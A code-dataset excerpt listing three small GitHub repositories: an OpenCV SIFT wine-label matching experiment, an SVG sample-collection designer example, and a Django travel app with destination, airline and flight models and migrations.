Dataset schema (column: type, observed range):
repo_name: string (length 5 to 114)
repo_url: string (length 24 to 133)
snapshot_id: string (length 40)
revision_id: string (length 40)
directory_id: string (length 40)
branch_name: string (209 distinct values)
visit_date: timestamp[ns]
revision_date: timestamp[ns]
committer_date: timestamp[ns]
github_id: int64 (9.83k to 683M)
star_events_count: int64 (0 to 22.6k)
fork_events_count: int64 (0 to 4.15k)
gha_license_id: string (17 distinct values)
gha_created_at: timestamp[ns]
gha_updated_at: timestamp[ns]
gha_pushed_at: timestamp[ns]
gha_language: string (115 distinct values)
files: list (length 1 to 13.2k)
num_files: int64 (1 to 13.2k)
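The example rows below follow this schema, one field per line. As a hedged illustration only (the dataset path and split name are placeholders, not taken from this page), a record with these columns could be streamed and filtered with the Hugging Face `datasets` library roughly like this:

```python
from datasets import load_dataset

# Placeholder dataset path and split; substitute the actual repository.
ds = load_dataset("org/some-code-dataset", split="train", streaming=True)

for row in ds:
    # Each row carries the columns listed above; `files` is a list of
    # per-file records with fields such as `path`, `language` and `text`.
    if row["star_events_count"] > 0 and row["gha_language"] == "Python":
        for f in row["files"]:
            print(row["repo_name"], f["path"], f["language"])
        break
```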
repo_name: lucnakache/winelabelmatching
repo_url: https://github.com/lucnakache/winelabelmatching
snapshot_id: df81e2067bddc33e7904968205351dcffce3e93f
revision_id: bd0b5b45b1a27070653e289f2ca163d9eac88e5c
directory_id: 8ce8d7d02950cdc4f60f72dc9b29c2152691da47
branch_name: refs/heads/master
visit_date: 2020-03-30T07:43:37.675172
revision_date: 2018-09-30T22:30:20
committer_date: 2018-09-30T22:30:20
github_id: 150,962,125
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
[ { "alpha_fraction": 0.6917159557342529, "alphanum_fraction": 0.7106508612632751, "avg_line_length": 28.15517234802246, "blob_id": "5638e8980685807496fe9c02be789b7ccd542a5f", "content_id": "5bdde46b43fa2ddeca3a8f708df9b431415d15c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1690, "license_type": "no_license", "max_line_length": 94, "num_lines": 58, "path": "/functions/computervision_functions.py", "repo_name": "lucnakache/winelabelmatching", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\n\ndef detect_and_draw_sift_features(imagepath):\n\n\t# Import image and preprocessing\n\timage = cv2.imread(imagepath)\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\t#Create SIFT Feature Detector object\n\tsift = cv2.SIFT()\n\n\t#Detect key points\n\tkeypoints = sift.detect(gray, None)\n\n\t# Draw rich key points on input image\n\timage = cv2.drawKeypoints(image, keypoints, flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\n\treturn keypoints,image\n\n\n\n\n\n\ndef compute_keypoints_matching(new_image_path, image_template_path):\n # Function that compares input image to template\n # It then returns the number of SIFT matches between them\n \n image2 = cv2.imread(image_template_path, 0)\n image1 = cv2.imread(new_image_path, 0)\n \n # Create SIFT detector object\n sift = cv2.SIFT()\n\n # Obtain the keypoints and descriptors using SIFT\n keypoints_1, descriptors_1 = sift.detectAndCompute(image1, None)\n keypoints_2, descriptors_2 = sift.detectAndCompute(image2, None)\n\n # Define parameters for our Flann Matcher\n FLANN_INDEX_KDTREE = 0\n index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 3)\n search_params = dict(checks = 100)\n\n # Create the Flann Matcher object\n flann = cv2.FlannBasedMatcher(index_params, search_params)\n\n # Obtain matches using K-Nearest Neighbor Method\n # the result 'matchs' is the number of similar matches found in both images\n matches = flann.knnMatch(descriptors_1, descriptors_2, k=2)\n\n # Store good matches using Lowe's ratio test\n good_matches = []\n for m,n in matches:\n if m.distance < 0.7 * n.distance:\n good_matches.append(m) \n\n return len(good_matches)" }, { "alpha_fraction": 0.7663716673851013, "alphanum_fraction": 0.769911527633667, "avg_line_length": 61.77777862548828, "blob_id": "7353520abd0f2b074d97f29667310579f926a040", "content_id": "e5d735c79b37c1c09e18c2990b1d4822aa97aa50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 581, "license_type": "no_license", "max_line_length": 397, "num_lines": 9, "path": "/resume/readme.md", "repo_name": "lucnakache/winelabelmatching", "src_encoding": "UTF-8", "text": "Keypoints matching and image definition\n================\n\nScatter plot\n------------\n\n![](scatter_plot_rmarkdown_files/figure-markdown_github/unnamed-chunk-1-1.png) .\n\nComme on peut le voir, les étiquettes représentant les mêmes vins ont généralement un grand nombre de keypoints en commun. Cependant, les étiquettes représentant des vins différents provenant d'un même producteur ont elles aussi beaucoup de keypoints en commun. Plus la qualité des étiquettes est élevée plus de keypoints sont détectés. 
Et de ce fait, il y a éventuellement plus de match possible.\n" }, { "alpha_fraction": 0.7881694436073303, "alphanum_fraction": 0.7897681593894958, "avg_line_length": 82.46666717529297, "blob_id": "3efbb5a2a4aef8a82e16a18db7a7ad7115a1a922", "content_id": "b49f2bc79b291f0c4b34ffc0feaf860d13690088", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1291, "license_type": "no_license", "max_line_length": 209, "num_lines": 15, "path": "/readme.md", "repo_name": "lucnakache/winelabelmatching", "src_encoding": "UTF-8", "text": "# Objectif\nL'objectif de ce projet est de mesurer la performance d'un alogorithme de matching simple basée sur SIFT.\n\n### La méthode utilisée et l'étude de cas en bref\n * On reçoit un couple d'images représenant deux étiquettes de vins.\n * On veut savoir s'il s'agit du même vin ou pas.\n * Pour chacune des images, on extrait les keypoints discriminants.\n * Via un KNN, on match les keypoints les plus proches\n * Si les deux images représentent l'étiquette d'un même vin alors leur nombre de keypoints matched doit être élevée.\n * Au contraire, si les deux images représentent l'étiquette de vins différents, alors on s'attend à observer un nombre de keypoints matched faible.\n\n### Résumé des Résultats\n* Si deux images représentent un même vin, alors le nombre de keypoints matched est relativement élevée. Ce nombre est d'autant plus grand que la qualité d'image est élevée.\n* Si deux images représentent deux vins différents (différents producteurs), alors le nombre de keypoints est faible (<20) et ce quelque soit la qualité des images.\n* Si deux images représentent des vins différents mais appartenant à un même producteur, alors le nombre de keypoints matched est relativement élevée. Cela est probablement dû à une charte graphique identique." }, { "alpha_fraction": 0.6936363577842712, "alphanum_fraction": 0.6972727179527283, "avg_line_length": 35.66666793823242, "blob_id": "368d63082728cc5cfb7c8bd9349317abc32ece51", "content_id": "6cbac4eb3db7b0311c0727b6cd2e79d83e2df75c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "RMarkdown", "length_bytes": 1116, "license_type": "no_license", "max_line_length": 397, "num_lines": 30, "path": "/resume/scatter_plot_rmarkdown.Rmd", "repo_name": "lucnakache/winelabelmatching", "src_encoding": "UTF-8", "text": "---\ntitle: \"Keypoints matching and image definition\"\noutput: github_document\n---\n\n```{r setup, include=FALSE}\nlibrary(ggplot2)\nlibrary(plotly)\nlibrary(rmarkdown)\nlibrary(knitr)\nfolderdata=\"C:/Users/Bar Yokhai/Desktop/projets/Blog/winelabelmatching/data/\"\nfilename = \"scatter.txt\"\npathfile = paste0(folderdata,filename)\nstats_cv_df = read.table(file = pathfile,\n header = TRUE ,\n sep = \"\\t\",\n stringsAsFactors = FALSE)\np <- ggplot(stats_cv_df, aes(keypoints,pixel_total, couple = couple ))\np = p + geom_point(aes(colour = factor(type)))\n```\n\n\n## Scatter plot\n\n```{r fig.width=7, fig.height=4, echo = FALSE, message = FALSE}\np\n```\n. \n\nComme on peut le voir, les étiquettes représentant les mêmes vins ont généralement un grand nombre de keypoints en commun. Cependant, les étiquettes représentant des vins différents provenant d'un même producteur ont elles aussi beaucoup de keypoints en commun. Plus la qualité des étiquettes est élevée plus de keypoints sont détectés. Et de ce fait, il y a éventuellement plus de match possible.\n" } ]
num_files: 4
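The compute_keypoints_matching function in the row above was written against the OpenCV 2.x API, where cv2.SIFT() constructs the detector; current OpenCV releases expose it as cv2.SIFT_create() in the main module instead. A minimal sketch of the same SIFT + FLANN + Lowe's-ratio pipeline under that assumption (the file paths and the 0.7 ratio are placeholders taken over from the row, not a definitive implementation):

```python
import cv2

def count_good_matches(path1, path2, ratio=0.7):
    # Load both label images in grayscale, as the row's script does.
    img1 = cv2.imread(path1, cv2.IMREAD_GRAYSCALE)
    img2 = cv2.imread(path2, cv2.IMREAD_GRAYSCALE)

    # cv2.SIFT_create() replaces the old cv2.SIFT() constructor.
    sift = cv2.SIFT_create()
    _, des1 = sift.detectAndCompute(img1, None)
    _, des2 = sift.detectAndCompute(img2, None)

    # FLANN matcher with a KD-tree index (algorithm=1 in OpenCV's bindings).
    flann = cv2.FlannBasedMatcher(dict(algorithm=1, trees=3), dict(checks=100))
    matches = flann.knnMatch(des1, des2, k=2)

    # Lowe's ratio test: keep a match only if it is clearly better than
    # the second-best candidate.
    good = 0
    for pair in matches:
        if len(pair) == 2 and pair[0].distance < ratio * pair[1].distance:
            good += 1
    return good
```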
repo_name: fossabot/pysvgsamplescollection
repo_url: https://github.com/fossabot/pysvgsamplescollection
snapshot_id: 6b3b0ebd74ac87b40e92167b06048abe588715f9
revision_id: 35c3b99a776d9f11c8363980722a0f0792a38978
directory_id: aab0cd2ed745ffc7fd49aac5edb5f74d2482c1ec
branch_name: refs/heads/master
visit_date: 2020-08-06T06:05:59.463528
revision_date: 2019-10-04T17:03:19
committer_date: 2019-10-04T17:03:19
github_id: 212,864,427
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: 2019-10-04T17:03:13
gha_updated_at: 2019-10-01T22:01:34
gha_pushed_at: 2019-10-01T22:01:32
gha_language: null
[ { "alpha_fraction": 0.7672316431999207, "alphanum_fraction": 0.7853107452392578, "avg_line_length": 37.4782600402832, "blob_id": "d30a7f6a7bcd5b335a6eebf0c4d57e0f9d41ca77", "content_id": "64539497f3e606e48cd96dd5e47ccd9d47cd845f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 885, "license_type": "no_license", "max_line_length": 76, "num_lines": 23, "path": "/examples/Silver_dastaset.py", "repo_name": "fossabot/pysvgsamplescollection", "src_encoding": "UTF-8", "text": "from svgsamplescollection import Samplescollection\nmySampCol = Samplescollection()\nmySampCol.name = 'Test silver'\nmySampCol.set_dataset_dimension.A4()\nmySampCol.set_sample_dimension.Microscope_slide()\nmySampCol.set_number_of_samples(15)\nmySampCol.margin_top_mm = 5\nmySampCol.margin_bottom_mm = 5\nmySampCol.minh_spacing_mm = 10\nmySampCol.minv_spacing_mm = 5\nmySampCol.create_sample_holder()\nmySampCol.populate_with_samples(material='silver')\nfor sample in mySampCol.samples[1:8]:\n sample.add_treatment(\"cheased\", \"graver\")\nfor sample in mySampCol.samples[1:5]:\n sample.add_layer(\"varnish\", \"nitorcellulose lacquer\", width_percent=0.7)\nfor sample in mySampCol.samples:\n sample.add_treatment(\"cleaning\", \"acetone\",width_percent=0.5)\nmySampCol.insert_alignment_MTF_standard()\nmySampCol.insert_scalebar()\nmySampCol.insert_standard()\nmySampCol.save_svg()\nmySampCol.save_masks_svg()\n" }, { "alpha_fraction": 0.7766934633255005, "alphanum_fraction": 0.7835820913314819, "avg_line_length": 57.099998474121094, "blob_id": "35f51ecc3c1e33c6cc7d8bde7ff469e0f33e4b7a", "content_id": "40b90e9fafd7ebc614b51e3fdd85f3805e7ecb7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1742, "license_type": "no_license", "max_line_length": 321, "num_lines": 30, "path": "/README.md", "repo_name": "fossabot/pysvgsamplescollection", "src_encoding": "UTF-8", "text": "# Python svg samples collection designer (IN DEVELOPMENT)\n[![FOSSA Status](https://app.fossa.io/api/projects/git%2Bgithub.com%2Fgiacomomarchioro%2Fpysvgsamplescollection.svg?type=shield)](https://app.fossa.io/projects/git%2Bgithub.com%2Fgiacomomarchioro%2Fpysvgsamplescollection?ref=badge_shield)\n\n\nThis Python script allows you to create a modified `.svg` rappresenting a flat samples collection. A flat samples collection is a group of flat samples (e.g. some pieces of metals with different varnishes, a series of coloured tile ...). The samples are contained in a samples holder that can be used as reference system.\n\n### Create, automate measurments and visualize\nThe `.svg`use the standard color coding of laser cutters so you can cut the samples and the samples holder with your laser cutter. If you don't have one you can find a [FabLab next to you](https://www.google.com/maps/search/fablab/) or use an [online service](https://www.google.com/search?q=online+laser+cutting).\n\nOnce you have your physical samples collection,if you have a positioning system (microscope stages, linear stages etc. etc) you can use the coordinates inside the `.svg` file for positioning your instrument on the sample (or the part of the sample) you are interested in.\n\nThe `.svg`can be read with any browser. 
The mouse over tooltip can show to anybody what's the last layer of your sample.\n\n\n### Create an .svg samples collection\n\n### Read and query the .svg file\n\n### Installation\n\n### Requirments\n\n\n\n\n\n\n\n## License\n[![FOSSA Status](https://app.fossa.io/api/projects/git%2Bgithub.com%2Fgiacomomarchioro%2Fpysvgsamplescollection.svg?type=large)](https://app.fossa.io/projects/git%2Bgithub.com%2Fgiacomomarchioro%2Fpysvgsamplescollection?ref=badge_large)" } ]
num_files: 2
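The README in the row above suggests reading coordinates out of the generated .svg to drive a positioning system (microscope stages, linear stages). As a hedged illustration only, and not the library's own API: a generic standard-library sketch that assumes the samples are drawn as SVG <rect> elements (the file name and element layout are assumptions):

```python
import xml.etree.ElementTree as ET

SVG_NS = "{http://www.w3.org/2000/svg}"

# Placeholder file name; adjust to the .svg produced by the collection.
tree = ET.parse("samples_collection.svg")

for rect in tree.getroot().iter(f"{SVG_NS}rect"):
    x = float(rect.get("x", 0))
    y = float(rect.get("y", 0))
    w = float(rect.get("width", 0))
    h = float(rect.get("height", 0))
    # Centre of each rectangle, e.g. as a target for a motorized stage.
    print(rect.get("id"), x + w / 2, y + h / 2)
```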
repo_name: icaboalo/backend
repo_url: https://github.com/icaboalo/backend
snapshot_id: 268843932c099ac1da33ec79ade99e99a87dc044
revision_id: 40e0a55d2d822c2fac65d49bd86ef3459187bdb8
directory_id: 8b3180db762ba4294ead57f4630dc8ed25fe3d2b
branch_name: refs/heads/master
visit_date: 2021-01-10T10:15:42.997002
revision_date: 2016-02-24T01:21:17
committer_date: 2016-02-24T01:21:17
github_id: 52,134,147
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
[ { "alpha_fraction": 0.7310584187507629, "alphanum_fraction": 0.733371913433075, "avg_line_length": 23.714284896850586, "blob_id": "9f68a9ee4755db0b31270992a1741c4988a6d34b", "content_id": "d5a8dffe5b5333d9bf877403b3d90163b8fc6f37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1729, "license_type": "no_license", "max_line_length": 82, "num_lines": 70, "path": "/project/aerolinea/models.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom destino.models import *\nfrom usuario.models import Usuario\nfrom utils.countryinfo import COUNTRY_CHOICES\n\n#ModelManager\nclass AerolinaManager(models.Manager):\n\tdef queryset(self):\n\t\treturn super().get_queryset().filter(is_active = True)\n\nclass MexicoCountryManager(models.Manager):\n\tdef queryset(self):\n\t\treturn super().get_queryset().filter(pais = 'MX')\n\nclass VuelosManager(models.Manager):\n\tdef get_queryset(self):\n\t\treturn super(VuelosManager, self).get_queryset().all()\n\n# Create your models here.\nclass Aerolinea(models.Model):\n\n\tclass Meta:\n\t\tverbose_name = \"Aerolinea\"\n\t\tverbose_name_plural = \"Aerolineas\"\n\n\t#Attributes\n\tnombre = models.CharField(max_length = 100, blank = False)\n\tpais = models.CharField(max_length = 2, choices = COUNTRY_CHOICES)\n\tis_active = models.BooleanField(default = True)\n\n\t#Manager\n\tobject = AerolinaManager()\n\t#active = AerolinaManager()\n\t#mexico = MexicoCountryManager()\n\n\tdef __str__(self):\n\t\treturn self.nombre\n\nclass Vuelo(models.Model):\n\n\tclass Meta:\n\t\tverbose_name = \"Vuelo\"\n\t\tverbose_name_plural = \"Vuelos\"\n\n\t#Relations\n\taerolinea = models.ForeignKey(Aerolinea)\n\tdestino = models.ForeignKey(Destino)\n\n\t#Attributes\n\tfecha = models.DateField(auto_now_add = True, blank = False)\n\thora = models.TimeField(auto_now_add = True, blank = False)\n\n\tdef __str__(self):\n\t\treturn (self.aerolinea.nombre + \" \" + self.destino.nombre)\n\n\t#Manager\n\tobject = VuelosManager()\n\nclass Bitacora(models.Model):\n\n\tclass Meta:\n\t\tverbose_name = \"Bitacora\"\n\t\tverbose_name_plural = \"Bitacoras\"\n\n\t#Relations\n\tusuario = models.ForeignKey(Usuario)\n\tvuelo = models.ForeignKey(Vuelo)\n\n\tdef __str__(self):\n\t\treturn self.usuario.usuario.first_name + \" viajo a \" + self.vuelo.destino.nombre" }, { "alpha_fraction": 0.5240793228149414, "alphanum_fraction": 0.5694050788879395, "avg_line_length": 24.214284896850586, "blob_id": "20b035a7ceda6ad4ba6595c5007fd610a7d1279e", "content_id": "a9591bd49b8a0f9dc43aba02004a7ee5edbe2aa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 706, "license_type": "no_license", "max_line_length": 63, "num_lines": 28, "path": "/project/destino/migrations/0004_auto_20160220_0215.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2016-02-20 02:15\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.manager\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('destino', '0003_auto_20160220_0143'),\n ]\n\n operations = [\n migrations.AlterModelManagers(\n name='destino',\n managers=[\n ('object', django.db.models.manager.Manager()),\n ],\n ),\n migrations.AddField(\n model_name='destino',\n name='rating',\n field=models.IntegerField(blank=True, default=5),\n preserve_default=False,\n ),\n ]\n" }, { 
"alpha_fraction": 0.5527328848838806, "alphanum_fraction": 0.570438802242279, "avg_line_length": 34.10810852050781, "blob_id": "e5360288cc37eb83940dd5e80eac3165e19231d5", "content_id": "e2a52628b8740b82fea7339b77a524c1b0717755", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1299, "license_type": "no_license", "max_line_length": 120, "num_lines": 37, "path": "/project/aerolinea/migrations/0001_initial.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2016-02-19 22:54\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('destino', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Aerolinea',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('nombre', models.CharField(max_length=100)),\n ('pais', models.CharField(max_length=2)),\n ('is_active', models.BooleanField(default=True)),\n ],\n ),\n migrations.CreateModel(\n name='Vuelo',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('fecha', models.DateField()),\n ('hora', models.TimeField()),\n ('aerolinea', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='aerolinea.Aerolinea')),\n ('destino', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='destino.Destino')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.5583524107933044, "alphanum_fraction": 0.6018306612968445, "avg_line_length": 22, "blob_id": "9a05d01c08e8d3f43f70c806db347608f75acd22", "content_id": "a3900bd46b0c72d9085b0af748a18b1c82130725", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 437, "license_type": "no_license", "max_line_length": 83, "num_lines": 19, "path": "/project/destino/migrations/0002_auto_20160220_0125.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2016-02-20 01:25\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('destino', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='destino',\n options={'verbose_name': 'Destino', 'verbose_name_plural': 'Destinos'},\n ),\n ]\n" }, { "alpha_fraction": 0.5580558180809021, "alphanum_fraction": 0.5796579718589783, "avg_line_length": 36.03333282470703, "blob_id": "1085145831ac1c69463afdcc27a8de9e802ab0a8", "content_id": "d1b6a32687b30740ae688743e091a2d5c1926a70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1112, "license_type": "no_license", "max_line_length": 200, "num_lines": 30, "path": "/project/aerolinea/migrations/0002_auto_20160220_0116.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2016-02-20 01:16\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('usuario', '0001_initial'),\n ('aerolinea', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Bitacora',\n fields=[\n ('id', 
models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('usuario', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='usuario.Usuario')),\n ('vuelo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='aerolinea.Vuelo')),\n ],\n ),\n migrations.AlterField(\n model_name='aerolinea',\n name='pais',\n field=models.CharField(choices=[('EU', 'ESTADOS UNIDOS'), ('MX', 'MEXICO'), ('AU', 'AUSTRALIA'), ('FR', 'FRANCIA'), ('BR', 'BRASIL'), ('SA', 'SUDAFRICA'), ('SP', 'ESPAÑA')], max_length=2),\n ),\n ]\n" }, { "alpha_fraction": 0.7395833134651184, "alphanum_fraction": 0.7395833134651184, "avg_line_length": 23.049999237060547, "blob_id": "902b49dfbe5ff57a202f4d0e001fe1c846d190c8", "content_id": "e1731c41f9f29e141ba980a947c8f3ae9ee7725c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 480, "license_type": "no_license", "max_line_length": 65, "num_lines": 20, "path": "/project/usuario/models.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom categoria.models import *\n\n# Create your models here.\nclass Usuario(models.Model):\n\n\tclass Meta:\n\t\tverbose_name = \"Usuario\"\n\t\tverbose_name_plural = \"Usuarios\"\n\n\t#Relations\n\tusuario = models.ForeignKey(User)\n\tperfil = models.ForeignKey(Categoria)\n\n\t#Attributes\n\tdate_added = models.DateTimeField(auto_now_add = True)\n\n\tdef __str__(self):\n\t\treturn (self.usuario.first_name + \" \" + self.usuario.last_name)" }, { "alpha_fraction": 0.5445161461830139, "alphanum_fraction": 0.5845161080360413, "avg_line_length": 27.703702926635742, "blob_id": "cb92fdb09dc27a66e62339b76c5e5328fc2c7ce1", "content_id": "de1a42c0e1b8772cf694508a3e18072957a122d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 775, "license_type": "no_license", "max_line_length": 87, "num_lines": 27, "path": "/project/aerolinea/migrations/0003_auto_20160220_0125.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2016-02-20 01:25\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('aerolinea', '0002_auto_20160220_0116'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='aerolinea',\n options={'verbose_name': 'Aerolinea', 'verbose_name_plural': 'Aerolineas'},\n ),\n migrations.AlterModelOptions(\n name='bitacora',\n options={'verbose_name': 'Bitacora', 'verbose_name_plural': 'Bitacoras'},\n ),\n migrations.AlterModelOptions(\n name='vuelo',\n options={'verbose_name': 'Vuelo', 'verbose_name_plural': 'Vuelos'},\n ),\n ]\n" }, { "alpha_fraction": 0.7305246591567993, "alphanum_fraction": 0.7408584952354431, "avg_line_length": 30.450000762939453, "blob_id": "bd78d592926f92d14bf53e18639b03e088d7272d", "content_id": "2d26f5b6d5c1a62b61ef9c5fc4c9a6cbb3548a9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1258, "license_type": "no_license", "max_line_length": 82, "num_lines": 40, "path": "/project/destino/models.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom categoria.models import *\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom utils.countryinfo import 
COUNTRY_CHOICES\n\n#ModelManager\nclass RatingManager(models.Manager):\n\tdef get_queryset(self):\n\t\treturn super().get_queryset().filter(rating_gt = 2)\n\nclass MexicoCountryManager(models.Manager):\n\tdef get_queryset(self):\n\t\treturn super(MexicoCountryManager, self).get_queryset().filter(pais = 'MX')\n\n# Create your models here.\nclass Destino(models.Model):\n\n\tclass Meta:\n\t\tverbose_name = \"Destino\"\n\t\tverbose_name_plural = \"Destinos\"\n\n\t#Relations\n\tcategoria = models.ForeignKey(Categoria)\n\n\t#Attributes\n\tnombre = models.CharField(max_length = 100, blank = False)\n\tpais = models.CharField(choices = COUNTRY_CHOICES, max_length = 2, blank = False)\n\tContinente = models.CharField(max_length = 100, blank = False)\n\timagen = models.ImageField(upload_to = 'media/pais/', blank = True)\n\tis_active = models.BooleanField(default = True)\n\trating = models.IntegerField(blank = True, validators = [MaxValueValidator(10),\n MinValueValidator(1)])\n\n\t#Manager\n\tobject = models.Manager()\n\ttop10 = RatingManager()\n\tmexico = MexicoCountryManager()\n\n\tdef __str__(self):\n\t\treturn (self.pais + \" \" + self.nombre)\n" }, { "alpha_fraction": 0.5609195232391357, "alphanum_fraction": 0.5931034684181213, "avg_line_length": 30.071428298950195, "blob_id": "b5084fa2e4f5b9319df5404ff697259594604960", "content_id": "6c2506adb05893446bebf46b6b7c017a7405ffcc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 870, "license_type": "no_license", "max_line_length": 120, "num_lines": 28, "path": "/project/destino/migrations/0001_initial.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2016-02-19 22:29\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('categoria', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Destino',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('nombre', models.CharField(max_length=100)),\n ('pais', models.CharField(max_length=100)),\n ('Continente', models.CharField(max_length=100)),\n ('categoria', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='categoria.Categoria')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.5615819096565247, "alphanum_fraction": 0.601129949092865, "avg_line_length": 33.03845977783203, "blob_id": "92cf96561052aa166ea9555c19220cf653daa34e", "content_id": "c88e085d59749c8f31cbefcca701cf8a405d6f94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 886, "license_type": "no_license", "max_line_length": 200, "num_lines": 26, "path": "/project/destino/migrations/0005_auto_20160220_0236.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2016-02-20 02:36\nfrom __future__ import unicode_literals\n\nimport django.core.validators\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('destino', '0004_auto_20160220_0215'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='destino',\n name='pais',\n field=models.CharField(choices=[('EU', 'ESTADOS UNIDOS'), ('MX', 'MEXICO'), ('AU', 'AUSTRALIA'), ('FR', 'FRANCIA'), ('BR', 'BRASIL'), ('SA', 'SUDAFRICA'), ('SP', 
'ESPAÑA')], max_length=2),\n ),\n migrations.AlterField(\n model_name='destino',\n name='rating',\n field=models.IntegerField(blank=True, validators=[django.core.validators.MaxValueValidator(10), django.core.validators.MinValueValidator(1)]),\n ),\n ]\n" }, { "alpha_fraction": 0.8177083134651184, "alphanum_fraction": 0.8177083134651184, "avg_line_length": 26.571428298950195, "blob_id": "541135711407f68b44fdd65fe809064a99625bd7", "content_id": "1150b8519013b5e644ac6abf4544fa9755701131", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 192, "license_type": "no_license", "max_line_length": 37, "num_lines": 7, "path": "/project/aerolinea/admin.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom . import models\n\n# Register your models here.\nadmin.site.register(models.Aerolinea)\nadmin.site.register(models.Vuelo)\nadmin.site.register(models.Bitacora)" }, { "alpha_fraction": 0.7322275042533875, "alphanum_fraction": 0.7393364906311035, "avg_line_length": 21.263158798217773, "blob_id": "fcd7502feaa17f81cb1ac662160a558ffef51cff", "content_id": "9e816fdbf4126a3c094dd1064dfaaaf43d99b74f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 422, "license_type": "no_license", "max_line_length": 62, "num_lines": 19, "path": "/project/categoria/models.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "from django.db import models\n\n#ModelManager\nclass Aventurero(models.Manager):\n\tdef queryset(self):\n\t\treturn super().get_queryset().filter(categoria = Aventurero)\n\n# Create your models here.\nclass Categoria(models.Model):\n\n\tclass Meta:\n\t\tverbose_name = \"Categoria\"\n\t\tverbose_name_plural = 